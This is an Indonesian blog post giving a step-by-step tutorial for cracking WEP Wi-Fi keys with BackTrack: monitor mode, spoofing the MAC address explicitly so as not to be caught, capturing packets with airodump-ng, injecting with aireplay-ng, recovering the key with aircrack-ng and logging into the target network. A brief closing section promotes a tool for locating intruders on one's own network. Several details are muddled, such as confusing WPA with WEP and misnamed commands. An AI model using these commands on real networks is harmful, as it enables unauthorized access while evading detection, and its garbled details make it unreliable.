Sabtu, 07 Januari 2012

Hacking WiFi Memakai Backtrack

           WiFi atau Wireless Fidelity adalah nama popular untuk teknologi wireless yang menggunakan gelombang radio guna menghadirkan internet wireless kecepatan tinggi dan koneksi network. Wifi telah menjadi bagian integral kehidupan manusia saat ini. Wifi diamankan menggunakan WPA(Wi-Fi Protected Access) protocol yang disiapkan untuk melindungi Wireless LAN seperti Wired LAN dengan jalan mengenkripsi data melalui gelombang radio.
           Sayangnya, ditemukan WEP(Wired Equivalent Privacy) tak seaman yang diyakini selama ini. Sekarang orang bisa menghack Wifi dengan mengenerate valid WEP key menggunakan distro Backtrack. Harap dicatat, tulisan ini bertujuan untuk edukasi. Bukan untuk disalahgunakan.

Setup Card dan Console
Boot up Backtrack di virtual machine/laptop dan buka command console lalu ketik perintah berikut.
  • ifconfig
Ini equivalent dengan perintah ipconfig. Anda akan menemukan network adaptor di sistem. Perhatikan mana yang untuk Wi-Fi. Beberapa contoh adalah wlan0, wifi0, dll.
  • airmon-ng
Perintah ini akan menginisialisasi Wi-Fi network monitoring dan memberi tahu anda berapa network dalam range
  • airmon-ng stop [Wi-Fi Card Name (tanpa tanda kutip)]
Perintah ini akan menghentikan card broadcast dan sesi segera.
  • macchanger –mac [Desired MAC address] [Wi-Fi card name]
Perintah ini akan mengubah MAC address saat ini ke MAC address yang dikehendaki, sehingga anda tidak tertangkap di kemudian waktu.
  • airmon-ng start [Wi-Fi Card name]
Anda akan mendapati adaptor lain yang diset pada monitor mode, gunakan adaptor tadi untuk tujuan lebih lanjut pada perintah-perintah berikut tempat – ‘[Wi-Fi card name]’ muncul

Dumping Packet
Usai set up semua parameter, Anda perlu mengendus dan mendump data packet untuk mendapatkan key. Anda bisa melakukannya dengan perintah-perintah berikut. Pada command console, ketik perintah-perintah ini.
  • airodump-ng [Wi-Fi card name]
Salin dan tempelkan BSSID di perintah berikut dan eksekusilah.
  • airodump-ng –c [Channel Number] –w [Filename untuk deskripsi] –bssid [BSSID] [Wi-Fi Card Name]
Saat Anda mengeksekusi perintah, Anda akan mendapati sejumlah inspirasi dan data packet yang akan disimpan di filename yang Anda tetapkan. File akan disimpan di root pada drive sistem (klik Computer dan Anda akan menemukan filenya). File hadir dalam du format: *.cap, *.txt.
Percepat Segalanya
Sayangnya packet dumping adalah proses yang sangat lambat, kita harus mempercepat segalanya untuk menghemat waktu. Buka console baru setelah data packet pertama disimpan dan ketikkan perintah di console baru lalu eksekusilah.

Airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] –e [Wi-Fi name (yang hendak dihack)] [Wi-Fi card name]

Saat mengetikkan perintah ini, Anda akan mendapati bahwa data packet yang dibutuhkan untuk membobol key akan meningkat drastis sehingga menghemat banyak waktu Anda.

Menampilkan WEP Key
Buka console lain setelah Anda disuguhi sekitar 20.000 data packet dan perintah berikut untuk menampilkan WEP key.

Aircrack-ng –n 64 –b [BSSID] [Filename tanpa extension]

Sewaktu mengetikkan perintah ini, Anda akan mendapati sebuah key dengan format semacam ini.
XX:XX:XX:XX

Tidak selalu key mempunyai digit yang sama seperti yang ditunjukkan diatas sehingga jangan heran bila menemukan key 10 digit atau 14 digit. Juga, bila enkripsi gagal, Anda bisa mengubah level bit untuk deskripsi dengan perintah,

Aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]

Ingat, bit level harusnya angka dengan 2n yang n: 1, 2, 3, 4.
Contoh:
aircrack-ng –n 32 –b [BSSID] [Filename tanpa extension] atau aircrack-ng –n 128 –b [BSSID] [Filename tanpa extension] dan lain-lain.
Sekarang login memakai WEP key yang anda dapat.

Obat Saat Wi-Fi Dipakai ilegal
Anda punya koneksi Wi-Fi? Anda merasa yakin betul dia aman? Kian merebaknya cyber crime, Wi-Fi Anda bisa jadi dipakai secara ilegal oleh orang lain. Ujung-ujungnya tagihan internet melambung dan jaringan Anda dituduh karena menyebarkan email berbahaya ke orang lain. Kasus ini pernah terjadi di India.
Bila Anda merasa koneksi Wi-Fi disusupi dan digunakan orang lain secara ilegal, saatnya anda mencoba MoocherHunter( security-tartshere.org/downloads/oswa-assis-tant.iso ).
MocherHunter adalah mobile tracking software tool untuk real-time on-the-fly geo-location. Dengan MocherHunter Anda bisa mengidentifikasi lokasi seseorang. Yaitu ilegal user yang memakai wireless network milik Anda. Selanjutnya, keputusan berada di tangan Anda.
Selamat Mencoba.

0 komentar:

Posting Komentar